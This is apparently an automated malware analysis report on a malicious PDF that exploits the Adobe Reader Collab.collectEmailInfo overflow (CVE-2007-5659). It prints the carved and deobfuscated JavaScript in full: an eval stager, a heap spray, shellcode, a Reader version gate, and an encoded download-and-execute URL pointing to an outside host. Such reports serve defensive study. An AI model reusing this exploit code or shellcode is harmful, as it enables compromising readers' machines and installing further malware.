Malicious PDF — malware analysis report

Static analysis result for SHA-256 8bbf5197be5d6744…

MALICIOUS

PDF

8.3 KB First seen: 2026-05-08
MD5: 54ce852cfed513185f2a2286e897b6b6 SHA-1: ed3811dde80df65a204ea7310cb29584ac8214d8 SHA-256: 8bbf5197be5d674419f1d6190a5202ff079bb305c37a57a6b85934d13f116d0e
266 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains multiple embedded JavaScript streams, some of which are obfuscated using String.fromCharCode and other techniques. The heuristics indicate that these scripts are designed to download and execute further malicious content. The presence of multiple obfuscated JavaScript artifacts suggests a downloader or dropper functionality, but the specific payload or target is not discernible from the provided evidence.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var I___wM_3 = new Array();var Cx6_rF65Gv_rUTp = 0;var NS_cN70 = "";function a111lO54(D_5_f63k56A_4, K__MQOD_PxS_u){var FB_jw1T_GAi = K__MQOD_PxS_u.toString();var ri_I1S__7 = "";for(var k_I2Wb = 0; k_I2Wb < FB_jw1T_GAi.length; k_I2Wb++) {var h3_3tk6k = parseInt(FB_jw1T_GAi.substr(k_I2Wb, 1));if (!isNaN(h3_3tk6k)) {h3_3tk6k = h3_3tk6k.toString(16);if (h3_3tk6k.length == 1) { h3_3tk6k = "0" + h3_3tk6k; }else if (h3_3tk6k.length != 2) { h3_3tk6k = "00"; }ri_I1S__7 = h3_3tk6k + ri_I1S__7;}}while(ri_ …
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://mysterio.info/cgi-bin/worker/z002106201r0019R11b04a95Xa9e64b76Y2d6500f6Z0100f060 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xE1 1814 bytes
SHA-256: b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,10,123,13,10,9,97,112,112,91,102,110,99,93,47,42,42,47,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js deobfuscated-js numeric char-code string decoded JavaScript at offset 0xEF 469 bytes
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1B93 1812 bytes
SHA-256: f063fde98313af9ddb6133640d349ea6a609304447d7bd626b7899af6c5bbe70
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function C0o_Jsl_j(H8_x57g_0, mI_oC_B_A){var d_5__K4tN__i = 0;var n_1_5D_TL2_yNl = 4;var l_F6sD1_p_0m = new Array();var rHCL__m = new Array(107,256,101,  512, 106, 126,  44,405, 142);var t__M6_2_7ERCo = "";rHCL__m[5] -= 103;try {var Jh__otnh6V = 0;if (app) {mI_oC_B_A = pr[Jh__otnh6V].subject;}} catch(e) {}d_5__K4tN__i = this;if (!H8_x57g_0) { l_F6sD1_p_0m[0] = 0;l_F6sD1_p_0m[1] = l_F6sD1_p_0m[0];l_F6sD1_p_0m[2] = l_F6sD1_p_0m[1];l_F6sD1_p_0m[3] = l_F6sD1_p_0m[2];var c__WpO_OyfD__e = rHCL__m[6] + 3;var J5y74eVd_1F8X = c__WpO_OyfD__e + 11;var Q_7WT_vSkM_Jm = C0o_Jsl_j;var t6_b___b = 0;Q_7WT_vSkM_Jm = Q_7WT_vSkM_Jm.toString();for(var p_J_5u5sBRPF86 = 0; p_J_5u5sBRPF86 < Q_7WT_vSkM_Jm.length; p_J_5u5sBRPF86++) {var j__231_Bg_w = Q_7WT_vSkM_Jm.charCodeAt(p_J_5u5sBRPF86);if (j__231_Bg_w > c__WpO_OyfD__e && j__231_Bg_w < J5y74eVd_1F8X) {if (t6_b___b == 4) {t6_b___b = 0;}l_F6sD1_p_0m[t6_b___b] += j__231_Bg_w;if (l_F6sD1_p_0m[t6_b___b] > rHCL__m[3]) {l_F6sD1_p_0m[t6_b___b] -= 512;}t6_b___b++;}}}else  { l_F6sD1_p_0m = H8_x57g_0;}for (var UWBe2_qfA08 = 0; UWBe2_qfA08 < 4; UWBe2_qfA08++) {if (l_F6sD1_p_0m[UWBe2_qfA08] > rHCL__m[1]) {l_F6sD1_p_0m[UWBe2_qfA08] -= rHCL__m[1];}}var q__g5___I1nm = 0;var VFKMT_t_a26er7 = 0;var k_x2TnmDw0A38_f;var KR_m464a_8BOCv = 0;while ( q__g5___I1nm < mI_oC_B_A.length ) {var W54NIBRCads = "";W54NIBRCads = mI_oC_B_A.substr(q__g5___I1nm, 2);var NWCt_vu3VYi = parseInt(W54NIBRCads, rHCL__m[5]); if (VFKMT_t_a26er7 == 4) {VFKMT_t_a26er7 = 0;}NWCt_vu3VYi -= (KR_m464a_8BOCv + 2) * l_F6sD1_p_0m[VFKMT_t_a26er7];if (NWCt_vu3VYi < 0) {NWCt_vu3VYi -= Math.floor(NWCt_vu3VYi / rHCL__m[1]) * rHCL__m[1];}t__M6_2_7ERCo += String.fromCharCode(NWCt_vu3VYi);{q__g5___I1nm += 2;KR_m464a_8BOCv++;VFKMT_t_a26er7++;}}d_5__K4tN__i["eval"](t__M6_2_7ERCo);return 0;}

	C0o_Jsl_j(0);
legacy_pdfkit_stage_001.js deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x4BB 4920 bytes
SHA-256: 7e9a722de6cc0e8ee52d417c8b86c4daf5eaa61770973ebb7e15d9ef8b73f672
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var I___wM_3 = new Array();var Cx6_rF65Gv_rUTp = 0;var NS_cN70 = "";function a111lO54(D_5_f63k56A_4, K__MQOD_PxS_u){var FB_jw1T_GAi = K__MQOD_PxS_u.toString();var ri_I1S__7 = "";for(var k_I2Wb = 0; k_I2Wb < FB_jw1T_GAi.length; k_I2Wb++) {var h3_3tk6k = parseInt(FB_jw1T_GAi.substr(k_I2Wb, 1));if (!isNaN(h3_3tk6k)) {h3_3tk6k = h3_3tk6k.toString(16);if (h3_3tk6k.length == 1) { h3_3tk6k = "0" + h3_3tk6k; }else if (h3_3tk6k.length != 2) { h3_3tk6k = "00"; }ri_I1S__7 = h3_3tk6k + ri_I1S__7;}}while(ri_I1S__7.length < 8) { ri_I1S__7 = "0" + ri_I1S__7; }var FXD4KF8o0cd4AB = D_5_f63k56A_4.toString(16);if (FXD4KF8o0cd4AB.length == 1) { FXD4KF8o0cd4AB = "0" + FXD4KF8o0cd4AB; }else if (FXD4KF8o0cd4AB.length != 2) { FXD4KF8o0cd4AB = "00"; }ri_I1S__7 = "3" + FXD4KF8o0cd4AB + "P" + ri_I1S__7;return ri_I1S__7;}function yi7bR4(jBf6RXN, O5uhT___3L_f1R){var m1M7_4t_pkD23c = new Array("");var ck3_KGE0 = jBf6RXN;var L_Na52_T3Y8J;if ((L_Na52_T3Y8J = jBf6RXN.lastIndexOf("%u00")) != -1) {if (L_Na52_T3Y8J + 6 == jBf6RXN.length) {m1M7_4t_pkD23c[0] = jBf6RXN.substr(L_Na52_T3Y8J + 4, 2);ck3_KGE0 = jBf6RXN.substring(0, L_Na52_T3Y8J);}}L_Na52_T3Y8J = 1;for (k_I2Wb = 0; k_I2Wb < O5uhT___3L_f1R.length; k_I2Wb++) {var V0Y_SvufV7RI6 = O5uhT___3L_f1R.charCodeAt(k_I2Wb).toString(16);if (V0Y_SvufV7RI6.length == 1) { V0Y_SvufV7RI6 = "0" + V0Y_SvufV7RI6; }m1M7_4t_pkD23c[L_Na52_T3Y8J] = V0Y_SvufV7RI6;L_Na52_T3Y8J++;}k_I2Wb = m1M7_4t_pkD23c[0].length ? 0 : 1;m1M7_4t_pkD23c[L_Na52_T3Y8J] = "00";m1M7_4t_pkD23c[L_Na52_T3Y8J + 1] = "00";L_Na52_T3Y8J += 2;if ((m1M7_4t_pkD23c.length - k_I2Wb) % 2) {m1M7_4t_pkD23c[L_Na52_T3Y8J] = "00";}while(k_I2Wb < m1M7_4t_pkD23c.length) {ck3_KGE0 += "%u" + m1M7_4t_pkD23c[k_I2Wb + 1] + m1M7_4t_pkD23c[k_I2Wb];k_I2Wb += 2;}ck3_KGE0 += "%u0000";return ck3_KGE0;}function m__I_i(d74p2y, cVW72_17L){while (d74p2y.length*2<cVW72_17L) {d74p2y += d74p2y;}d74p2y = d74p2y.substring(0,cVW72_17L/2);return d74p2y;}function i_yBY3D4_Fq(X_3Shl_aFx, qCF5KPXja8ON, WAI8w2__O_Bw__m){var F_O21rTrB = 0x0c0c0c0c;var d74p2y = unescape(qCF5KPXja8ON);var O5uhT___3L_f1R = a111lO54(X_3Shl_aFx, WAI8w2__O_Bw__m);var W_vo_a__L = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var jBf6RXN = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6f70%u7462%u004b%u7468%u7074%u2f3a%u6d2f%u7379%u6574%u6972%u2e6f%u6e69%u6f66%u632f%u6967%u622d%u6e69%u772f%u726f%u656b%u2f72%u307a%u3230%u3031%u3236%u3130%u3072%u3130%u5239%u3131%u3062%u6134%u3539%u6158%u6539%u3436%u3762%u5936%u6432%u3536%u3030%u3666%u305a%u3031%u6630%u3630%u0030";app.W_egoL_E_Y2 = unescape(yi7bR4(jBf6RXN, O5uhT___3L_f1R));var V__pfy_WEr1 = 0x400000;var P_YFG_V_F17 = W_vo_a__L.length * 2;var cVW72_17L = V__pfy_WEr1 - (P_YFG_V_F17+0x38);d74p2y = m__I_i(d74p2y, cVW72_17L);var aO_1_8W = (F_O21rTrB - 0x400000)/V__pfy_WEr1;for (var R_MI__bk = 0; R_MI__bk < aO_1_8W; R_MI__bk++) {I___wM_3[R_MI__bk] = d74p2y + W_vo_a__L;}}function e7q2Ev(){var B8WUsLLM_Vpq = "";for (k_I2Wb = 0; k_I2Wb < 12; k_I2Wb++) {B8WUsLLM_Vpq += unescape("%u0c0c%u0c0c");}var D_c_3N = "";for (k_I2Wb = 0; k_I2Wb < 750; k_I2Wb++) {D_c_3N += B8WUsLLM_Vpq;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: D_c_3N});app.clearTimeOut(Cx6_rF65Gv_rUTp);}function J6VELle_X_p4(rOY_fuBGf51GHn){var NTDX_glfIlg_7 = Cx6_rF65Gv_rUTp;if ((rOY_fuBGf51GHn >= 8 && rOY_fuBGf51GHn < 8.11) || rOY_fuBGf51GHn < 7.1) {i_yBY3D4_Fq(23, "%u0c0c%u0c0c", rOY_fuBGf51GHn);e7q2Ev();}if (NTDX_glfIlg_7) {app.clearTimeOut(NTDX_glfIlg_7);}}var WAI8w2__O_Bw__m = 0;var bOP_G4Ba__C1_i = app.plugIns;for (var eay8Mjbt = 0; eay8Mjbt < bOP_G4Ba__C1_i.length; eay8Mjbt++) {var X6j58_Lu = bOP_G4Ba__C1_i[eay8Mjbt].version;if (X6j58_Lu > WAI8w2__O_Bw__m) { WAI8w2__O_Bw__m = X6j58_Lu; }}if (app.viewerVersion == 9.103 && WAI8w2__O_Bw__m < 9.13) {WAI8w2__O_Bw__m = 9.13;}app.bQD_vIk = J6VELle_X_p4;Cx6_rF65Gv_rUTp = app.setTimeOut("app.bQD_vIk(" + WAI8w2__O_Bw__m.toString() + ")", 50);

Open this report in the interactive analyzer, or submit your own file for analysis.